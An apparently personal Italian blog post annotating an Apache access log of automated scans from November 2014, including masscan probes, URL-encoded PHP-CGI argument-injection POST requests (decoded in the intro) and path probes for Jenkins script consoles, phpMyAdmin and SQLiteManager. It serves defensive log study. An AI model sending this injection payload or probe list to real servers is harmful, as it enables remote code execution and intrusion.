Questo puo' essere considerato il bignamino delle scansioni su un server Apache
Si inizia con msscan, un programma per fare scansioni di Internet ad alta velocita' (un parente di nmap)
Poi iniziano scansioni alla ricerca di php4 e php5 installati come cgi. Le stringhe sono codificate ma sono del tipo
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n
si finisce con una serie di ricerche su software installati (VTiger, Jenkins Script Console, Hudson script console, PhpMyAdmin, SQLiteManager
giusto per ricordarsi che se devo proprio installare qualcosa, metterlo in posizione non standard non e' una sicurezza ma aiuta in caso di scansioni automatiche
-----------------------------------------------------------------------------------------------------------------------
104.192.0.19 - - [23/Nov/2014:11:28:24 +0100] "GET / HTTP/1.0" 200 146 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
200.136.214.133 - - [23/Nov/2014:12:24:56 +0100] "GET /w00tw00t.at.ISC.SANS.Win32:) HTTP/1.1" 400 283 "-" "-"
175.139.254.201 - - [23/Nov/2014:12:29:02 +0100] "GET /tmUnblock.cgi HTTP/1.1" 400 283 "-" "-"
104.156.230.207 - - [23/Nov/2014:12:59:25 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 283 "-" "-"
216.218.206.66 - - [23/Nov/2014:14:01:04 +0100] "GET / HTTP/1.1" 200 146 "-" "-"
216.218.206.66 - - [23/Nov/2014:14:06:04 +0100] "GET / HTTP/1.1" 200 146 "-" "-"
46.165.220.215 - - [23/Nov/2014:14:38:01 +0100] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 290 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
104.131.108.12 - - [23/Nov/2014:14:57:14 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
194.60.242.251 - - [23/Nov/2014:18:50:59 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 272 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
194.60.242.251 - - [23/Nov/2014:18:50:59 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 273 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
194.60.242.251 - - [23/Nov/2014:18:50:59 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 276 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
194.60.242.251 - - [23/Nov/2014:18:50:59 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 276 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
194.60.242.251 - - [23/Nov/2014:18:51:00 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 273 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
206.71.197.103 - - [24/Nov/2014:02:41:34 +0100] "GET /tmUnblock.cgi HTTP/1.1" 400 283 "-" "-"
85.17.82.67 - - [24/Nov/2014:03:43:02 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 272 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
85.17.82.67 - - [24/Nov/2014:03:43:02 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 273 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
85.17.82.67 - - [24/Nov/2014:03:43:02 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 276 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
85.17.82.67 - - [24/Nov/2014:03:43:02 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 276 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
85.17.82.67 - - [24/Nov/2014:03:43:02 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 273 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
63.138.17.133 - - [24/Nov/2014:03:56:51 +0100] "GET /vtigercrm/ HTTP/1.1" 404 272 "-" "curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
80.82.64.29 - - [24/Nov/2014:03:59:55 +0100] "GET /checkupdate.asmx HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
67.198.128.138 - - [24/Nov/2014:11:25:53 +0100] "GET /web-console/ServerInfo.jsp HTTP/1.1" 404 287 "-" "-"
217.31.48.30 - - [24/Nov/2014:12:57:30 +0100] "HEAD /rom-0 HTTP/1.1" 404 - "-" "Python-httplib2/0.7.4 (gzip)"
141.212.121.225 - - [24/Nov/2014:13:17:30 +0100] "GET / HTTP/1.1" 200 146 "-" "-"
91.121.18.214 - - [24/Nov/2014:15:55:16 +0100] "GET / HTTP/1.1" 200 146 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:16 +0100] "GET /script HTTP/1.1" 404 267 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:19 +0100] "GET /jenkins/script HTTP/1.1" 404 275 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:19 +0100] "GET /hudson/script HTTP/1.1" 404 274 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:19 +0100] "GET /login HTTP/1.1" 404 266 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:20 +0100] "GET /jenkins/login HTTP/1.1" 404 274 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:21 +0100] "GET /hudson/login HTTP/1.1" 404 273 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:22 +0100] "GET /jmx-console HTTP/1.1" 404 272 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:22 +0100] "GET /manager/html HTTP/1.1" 404 273 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:22 +0100] "GET /msd HTTP/1.1" 404 264 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /mySqlDumper HTTP/1.1" 404 272 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /msd1.24stable HTTP/1.1" 404 274 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /msd1.24.4 HTTP/1.1" 404 270 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /mysqldumper HTTP/1.1" 404 272 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /MySQLDumper HTTP/1.1" 404 272 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /mysql HTTP/1.1" 404 266 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:23 +0100] "GET /sql HTTP/1.1" 404 264 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:24 +0100] "GET /phpmyadmin HTTP/1.1" 404 271 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:24 +0100] "GET /phpMyAdmin HTTP/1.1" 404 271 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:27 +0100] "GET /mysql HTTP/1.1" 404 266 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:27 +0100] "GET /sql HTTP/1.1" 404 264 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:27 +0100] "GET /myadmin HTTP/1.1" 404 268 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:28 +0100] "GET /phpMyAdmin-4.2.1-all-languages HTTP/1.1" 404 291 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:31 +0100] "GET /phpMyAdmin-4.2.1-english HTTP/1.1" 404 285 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:31 +0100] "GET / HTTP/1.1" 200 146 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:31 +0100] "GET /sqlite/main.php HTTP/1.1" 404 276 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:31 +0100] "GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1" 404 296 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:32 +0100] "GET /SQLiteManager-1.2.4/main.php HTTP/1.1" 404 289 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:33 +0100] "GET /sqlitemanager/main.php HTTP/1.1" 404 283 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:33 +0100] "GET /SQlite/main.php HTTP/1.1" 404 276 "-" "Python-urllib/2.7"
91.121.18.214 - - [24/Nov/2014:15:55:34 +0100] "GET /SQLiteManager/main.php HTTP/1.1" 404 283 "-" "Python-urllib/2.7"
Iscriviti a:
Commenti sul post (Atom)
Alpine Linux 2024 su IBM A31
Ho provato a far resuscitare un IBM A31 destinato alla discarica. La macchina ha processore P4, 256 Mb di RAM, la batteria CMOS morta ed e...
-
In questo post viene indicato come creare uno scatterplot dinamico basato da dati ripresi da un file csv (nel dettaglio il file csv e' c...
-
Questo post e' a seguito di quanto gia' visto nella precedente prova Lo scopo e' sempre il solito: creare un sistema che permet...
-
La scheda ESP32-2432S028R monta un Esp Dev Module con uno schermo TFT a driver ILI9341 di 320x240 pixels 16 bit colore.Il sito di riferiment...
Nessun commento:
Posta un commento